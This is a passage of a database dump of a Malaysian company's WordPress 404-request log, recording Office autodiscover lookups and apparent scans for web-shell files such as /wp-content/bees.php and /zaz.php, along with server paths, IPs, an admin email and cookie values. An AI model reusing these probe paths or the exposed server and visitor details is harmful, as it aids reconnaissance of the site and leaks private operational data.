01:56:06',35903288,36154888,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'115.132.144.171'),(27377,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4605C1CC-8782-4ECB-B950-24C7959F4C65\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKpXn8O70Y-6jRKSqTL@wAAAZY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"63491\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKpXn8O70Y-6jRKSqTL@wAAAZY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569892702.4656\";s:12:\"REQUEST_TIME\";s:10:\"1569892702\";}}','notice','2019-10-01 01:18:27','2019-10-01 01:18:23',35501232,37292336,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27376,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5C8143E2-615E-4D77-B263-C58E538E5B9B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKmrRhRvBce6cZZqh4MjwAAARc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"54652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKmrRhRvBce6cZZqh4MjwAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569892013.249\";s:12:\"REQUEST_TIME\";s:10:\"1569892013\";}}','notice','2019-10-01 01:06:55','2019-10-01 01:06:53',35499776,37291712,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27104,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/thfncjyhea.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b57eead6ea69ddfdb47725a345aab4f5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/thfncjyhea.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/thfncjyhea.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GSVWB4BRJuHfwY@mOKwAAAMI\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/thfncjyhea.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/thfncjyhea.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GSVWB4BRJuHfwY@mOKwAAAMI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.29\";s:11:\"REMOTE_PORT\";s:5:\"38801\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/thfncjyhea.php\";s:10:\"SCRIPT_URL\";s:15:\"/thfncjyhea.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GSVWB4BRJuHfwY@mOKwAAAMI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523274.0016\";s:12:\"REQUEST_TIME\";s:10:\"1569523274\";}}','notice','2019-09-26 18:41:15','2019-09-26 18:41:14',35178512,36978688,'https://bintara.com.my/thfncjyhea.php',1,0,'185.220.101.29'),(27103,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/wp-content/bees.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/bees.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/bees.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GQFfhYxBkXBDDAIo9rQAAAJU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/bees.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/bees.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GQFfhYxBkXBDDAIo9rQAAAJU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"35724\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/bees.php\";s:10:\"SCRIPT_URL\";s:20:\"/wp-content/bees.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GQFfhYxBkXBDDAIo9rQAAAJU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523264.1808\";s:12:\"REQUEST_TIME\";s:10:\"1569523264\";}}','notice','2019-09-26 18:41:06','2019-09-26 18:41:04',35181200,36985808,'https://bintara.com.my/wp-content/bees.php',1,0,'104.218.63.75'),(27102,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/.log.phtml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/.log.phtml\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/.log.phtml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GOYobU@zjjbgWMCB0oQAAARY\";s:12:\"REDIRECT_URL\";s:11:\"/.log.phtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"45402\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/.log.phtml\";s:10:\"SCRIPT_URL\";s:11:\"/.log.phtml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GOYobU@zjjbgWMCB0oQAAARY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523257.3946\";s:12:\"REQUEST_TIME\";s:10:\"1569523257\";}}','notice','2019-09-26 18:40:59','2019-09-26 18:40:57',35172624,36976432,'https://bintara.com.my/.log.phtml',1,0,'104.218.63.75'),(27123,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"147-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"BFF474D7-C321-4DDF-BB96-DC4CD32C7C30\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"147-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1gRFfhYxBkXBDDAIpjVwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"49472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1gRFfhYxBkXBDDAIpjVwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546308.2009\";s:12:\"REQUEST_TIME\";s:10:\"1569546308\";}}','notice','2019-09-27 01:05:11','2019-09-27 01:05:08',35894960,37689104,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27101,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/zaz.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=60cb5ae1add1e3684663e4f87e2aca9e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/zaz.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/zaz.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GLVfhYxBkXBDDAIo9mQAAAIU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/zaz.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/zaz.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GLVfhYxBkXBDDAIo9mQAAAIU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"45121\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/zaz.php\";s:10:\"SCRIPT_URL\";s:8:\"/zaz.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GLVfhYxBkXBDDAIo9mQAAAIU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523245.9531\";s:12:\"REQUEST_TIME\";s:10:\"1569523245\";}}','notice','2019-09-26 18:40:47','2019-09-26 